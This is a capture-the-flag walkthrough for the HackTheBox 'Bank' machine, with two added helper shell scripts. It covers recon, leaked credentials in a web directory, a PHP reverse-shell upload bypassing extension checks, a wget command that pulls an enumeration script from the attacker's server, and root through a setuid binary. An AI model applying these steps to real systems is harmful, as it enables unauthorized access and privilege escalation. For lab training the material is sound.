As always, start with nmap -sC -sV -oA ./bank 10.10.10.29
That turns up SSH, DNS, and HTTP. I don't know enough just yet to do anything useful with SSH or DNS, so let's check the web service.
Well, that's just the default Apache page. Not very helpful. Dirbuster and gobuster both show nothing helpful at http://10.10.10.29. It's possible that the web service is served by name rather than by IP (a virtual host), so let's add bank.htb to /etc/hosts and see if that works.
Ok. Now we can see the login page. Let's run dirbuster and/or gobuster against bank.htb and also try navigating around. Navigation shows a login page; gobuster only shows 3 folders, but dirbuster is giving us a treasure trove of information. This situation highlights the necessity of understanding different tools that perform the same function but produce VASTLY different outcomes, which usually comes down to the wordlist, recursion, and extension settings each one is run with.
Digging through all the Dirbuster discoveries, we eventually get to http://bank.htb/balance_transfer/, which contains .acc files that are all between 583 and 585 bytes. All except ONE: there is one file that is 257 bytes. There's your anomaly. Sorting the directory listing by size makes it jump out.
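Eyeballing a sorted listing works for a few dozen files; the same check as a script, so it scales to thousands, is below. This is an added example and not part of the original writeup: it reports every .acc file whose size deviates from the most common size in the directory. The sample files it builds are constructed for the demo and are not the contents of balance_transfer/.

```shell
#!/bin/sh
# Added example, not from the original writeup: flag files whose size
# deviates from the group's typical size. The sample .acc files below are
# constructed for the demo and are not the real balance_transfer/ contents.

# size_outliers DIR [TOL]: print every *.acc file under DIR whose size
# differs from the most common size (the mode) by more than TOL bytes.
size_outliers() {
    dir=$1
    tol=${2:-10}
    # "size<TAB>path" for each file; tr strips the padding some wc builds emit
    list=$(for f in "$dir"/*.acc; do
        [ -f "$f" ] || continue
        printf '%s\t%s\n' "$(wc -c < "$f" | tr -d ' ')" "$f"
    done)
    [ -n "$list" ] || return 1
    # the most frequent size is the baseline everything is compared against
    mode=$(printf '%s\n' "$list" | cut -f1 | sort -n | uniq -c | sort -rn | head -n 1 | awk '{print $2}')
    printf '%s\n' "$list" | awk -F'\t' -v m="$mode" -v t="$tol" '
        { d = $1 - m; if (d < 0) d = -d
          if (d > t) print $2 " (" $1 " bytes, typical " m ")" }'
}

# make_sample: build a throwaway directory that mimics the listing described
# above: five files of 583-585 bytes and one 257-byte file. Prints the path.
make_sample() {
    d=$(mktemp -d)
    i=0
    for n in 583 584 585 584 584; do
        printf "%${n}s" '' | tr ' ' 'x' > "$d/acct$i.acc"
        i=$((i + 1))
    done
    printf '%257s' '' | tr ' ' 'c' > "$d/odd.acc"
    printf '%s' "$d"
}

# Usage: build the sample, report the odd one out, clean up
sample_dir=$(make_sample)
size_outliers "$sample_dir"
rm -rf "$sample_dir"
```

The tolerance defaults to 10 bytes, which is wide enough to absorb the 583-585 spread while still catching a 257-byte file; widen it if the files you are looking at legitimately vary more.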
Open it and we get:
Oh look. Credentials. So I log into the portal at http://bank.htb/login.php and we are presented with the HTB Bank transaction list/mini balance sheet and a Support page.
There's a section to upload a file! If we can upload files, I wonder whether there are type restrictions (only jpg, png, etc. accepted, or .php or .py allowed through) and whether uploaded files are executed. Examining the page source gives us our answer.
Nice. Using the PHP reverse shell from Pentest Monkey (with the IP and port set to our listener) and naming it shell.htb, the extension the page source pointed us to, we start a netcat listener and upload the file. Once uploaded, hit Click Here and you're in.
We have a shell as www-data. Now, on our attacking machine, we navigate to wherever we put LinEnum.sh (which for me is /LinEnum/LinEnum.sh) and, once in the LinEnum directory, fire up SimpleHTTPServer with python -m SimpleHTTPServer 9091. From the victim machine, navigate to /tmp and run wget http://[YOURIP]:9091/LinEnum.sh. LinEnum is now on the target. Make it executable with chmod +x LinEnum.sh (I used 777, but execute is all it needs) and run ./LinEnum.sh (output of it is in the CTB file above; fair warning: I use -t for thorough). Digging through the output, I notice SUID is set on /var/htb/bin/emergency. What is this file? What does it do? Running file on it:
emergency: setuid ELF 32-bit LSB shared object, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=1fff1896e5f8db5be4db7b7ebab6ee176129b399, stripped
An ELF? Let's run it! Well, crap. That dropped me out of my tty shell. I run python -c 'import pty; pty.spawn("/bin/bash")' again to get my TTY back and behold! bash-4.3$ What? whoami still shows me as www-data. What weirdness is this? I can cat both flags in here! Ok. That works. One hiccup I did find: if I am in a bash TTY, I cannot cat /root/root.txt, but if I stay in the # sh shell that emergency drops me into, then I can cat both. That is bash's doing, not the binary's: when bash starts with an effective UID that differs from its real UID, it resets the effective UID to the real one unless it was invoked with -p, so spawning a plain bash from the root sh quietly throws the privilege away. Running id in the # shell shows the state you are in (look for euid=0 next to the www-data uid); stay in that sh, or spawn bash -p instead of bash, to keep root.
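Two small checks that go with the SUID step above, as an added example that is not part of the original writeup: find_suid is the same test LinEnum performs with find / -perm -4000, and uid_mismatch reads a line of id output and says whether root is held only as the effective UID, which is exactly the state a plain bash (without -p) discards. The id lines in the block are constructed, not captured from the box.

```shell
#!/bin/sh
# Added example, not from the original writeup: two small checks around the
# SUID step. find_suid mirrors LinEnum's find / -perm -4000; uid_mismatch
# reads an `id` line and says whether root is held only as the effective UID.
# The id lines at the bottom are constructed samples, not output from the box.

# find_suid DIR: list regular files under DIR with the setuid bit set.
find_suid() {
    find "$1" -type f -perm -4000 2>/dev/null | sort
}

# uid_mismatch "ID_OUTPUT": classify one line of `id` output.
#   real       - real uid is 0: root for good, any shell keeps it
#   euid-only  - uid is unprivileged but euid is 0: keep sh or use bash -p
#   none       - no root at all
uid_mismatch() {
    fields=$(printf '%s\n' "$1" | tr ' ' '\n')
    uid=$(printf '%s\n' "$fields" | sed -n 's/^uid=\([0-9]*\).*/\1/p')
    euid=$(printf '%s\n' "$fields" | sed -n 's/^euid=\([0-9]*\).*/\1/p')
    euid=${euid:-$uid}          # id only prints euid= when it differs from uid
    if [ "$uid" = 0 ]; then
        echo real
    elif [ "$euid" = 0 ]; then
        echo euid-only
    else
        echo none
    fi
}

# Constructed sample lines (not captured from the box)
SUID_SH_ID='uid=33(www-data) gid=33(www-data) euid=0(root) groups=33(www-data)'
PLAIN_ID='uid=33(www-data) gid=33(www-data) groups=33(www-data)'

# Usage: the first line is what you want to see in the sh that a setuid-root
# binary spawns; "euid-only" means bash without -p would drop it again.
uid_mismatch "$SUID_SH_ID"
uid_mismatch "$PLAIN_ID"

# Usage: a throwaway directory with one setuid file stands in for the real
# filesystem walk, which you would run as find_suid /
demo=$(mktemp -d)
: > "$demo/plain"
: > "$demo/emergency"
chmod 4755 "$demo/emergency"
find_suid "$demo"
rm -rf "$demo"
```

On a real target run find_suid / and compare the result against the distribution's stock setuid binaries (passwd, su, sudo, mount and friends); anything outside /usr/bin and /bin, such as a file under /var, is the one to look at first.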